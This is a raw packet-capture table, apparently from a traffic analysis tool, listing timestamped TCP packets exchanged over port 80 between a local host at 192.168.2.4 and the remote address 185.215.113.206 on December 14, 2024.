Dec 14, 2024 12:56:38.162575006 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.162636042 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.163511992 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.163562059 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.163645029 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.164429903 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.164479971 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.164493084 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.165112019 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.165357113 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.165431976 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.165451050 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.165509939 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.166277885 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.166321039 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.166385889 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.166451931 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.167253017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.167375088 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.167378902 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.169646025 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.219006062 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.219058990 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.219079971 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.219130039 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.219176054 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.219228983 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.219372034 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.220331907 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.220388889 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.220393896 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.220431089 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.220990896 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.221040010 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.221116066 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.221157074 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.221971989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.222094059 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.222143888 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.222862959 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.222908974 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.222978115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.223649979 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.223818064 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.223864079 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.223946095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.223990917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.224802017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.224859953 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.224912882 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.224963903 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.225697041 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.225744009 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.225806952 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.225851059 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.226835966 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.226958036 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.227015018 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.227684021 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.227771997 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.227828026 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.228507996 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.228667974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.228734970 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.229486942 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.229554892 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.229588985 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.229635954 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.230420113 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.230467081 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.230530024 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.231355906 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.231406927 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.231440067 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.231648922 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.232315063 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.232369900 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.232414007 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.233184099 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.233297110 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.233345032 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.234143019 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.234312057 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.234348059 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.234414101 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.235088110 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.235141039 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.235198021 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.235651016 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.236110926 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.236159086 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.236222982 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.236267090 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.237083912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.237128973 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.237176895 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.237221956 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.237931967 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.238033056 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.238086939 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.238851070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.238903046 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.238956928 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.238997936 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.239728928 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.239770889 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.277618885 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.277700901 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.277717113 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.277753115 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.277765989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.277806997 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.277812004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.277848005 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.278609037 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.278666973 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.278721094 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.279354095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.279397964 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.279408932 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.279644012 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.279838085 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.279881954 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.279967070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.280008078 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.280982971 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.281032085 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.281094074 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.281146049 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.281770945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.281862974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.281908989 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.282612085 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.282717943 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.282763958 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.283502102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.283637047 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.283651114 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.283670902 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.284447908 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.284498930 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.284579992 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.284629107 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.285382986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.285430908 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.285440922 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.285480022 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.286359072 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.286408901 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.286468983 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.286511898 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.287348032 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.287398100 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.287404060 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.287450075 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.288259983 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.288325071 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.288337946 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.288402081 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.289179087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.289277077 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.289283991 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.289328098 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.290136099 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.290194988 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.290239096 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.291079044 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.291131020 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.291191101 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.291651011 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.291991949 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.292129040 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.292175055 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.292917013 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.293025017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.293078899 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.293833971 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.293880939 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.293961048 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.294004917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.294765949 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.294814110 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.294861078 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.294910908 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.351562023 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.351617098 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.351624966 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.351680994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.351718903 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.351877928 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.351916075 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.351927996 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.351960897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.353085995 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.353140116 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.353168011 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.353183985 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.354003906 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.354070902 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.354070902 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.354193926 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.355020046 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.355078936 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.355110884 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.355124950 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.355648994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.355750084 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.355798960 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.356601954 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.356661081 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.356667995 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.356741905 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.357537985 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.357590914 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.357600927 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.357640982 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.358449936 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.358521938 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.358552933 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.358623028 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.359419107 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.359488010 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.359524012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.359652042 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.410877943 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.410964012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.411004066 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.411040068 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.411171913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.411225080 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.411232948 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.411261082 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.412060976 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.412153959 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.412818909 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.412879944 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.412935972 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.413677931 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.413794994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.413847923 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.414654016 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.414706945 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.414710045 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.414982080 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.415579081 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.415657997 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.415755033 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.415837049 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.416471958 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.416579962 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.417429924 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.417481899 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.417547941 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.418435097 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.418483973 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.418551922 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.418631077 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.419332027 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.419420004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.419439077 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.419461966 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.420241117 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.420360088 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.420367956 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.420461893 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.421196938 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.421297073 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.422128916 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.422177076 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.422199965 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.423049927 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.423105955 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.423203945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.423249960 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.424041986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.424139977 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.425028086 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.425064087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.425079107 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.425101995 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.425904989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.425996065 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.426044941 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.426809072 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.426937103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.426970959 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.427017927 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.427743912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.427854061 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.427915096 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.428702116 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.428762913 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.428901911 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.428951979 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.429671049 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.429828882 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.429847956 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.429876089 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.430701017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.430747032 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.430828094 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.431504011 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.431566000 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.469636917 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.469692945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.469748974 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.470068932 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.470133066 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.470169067 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.470333099 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.470731974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.470778942 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.470843077 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.470843077 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.471585989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.471636057 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.471869946 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.472007036 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.472064972 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.472784996 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.472831011 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.472898006 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.473712921 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.473809004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.473855019 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.474656105 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.474807024 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.474961996 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.475586891 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.475646019 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.475658894 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.475693941 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.476586103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.476774931 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.476839066 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.477510929 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.477603912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.477672100 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.478462934 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.478590012 CET	49834	80	192.168.2.4	185.215.113.206
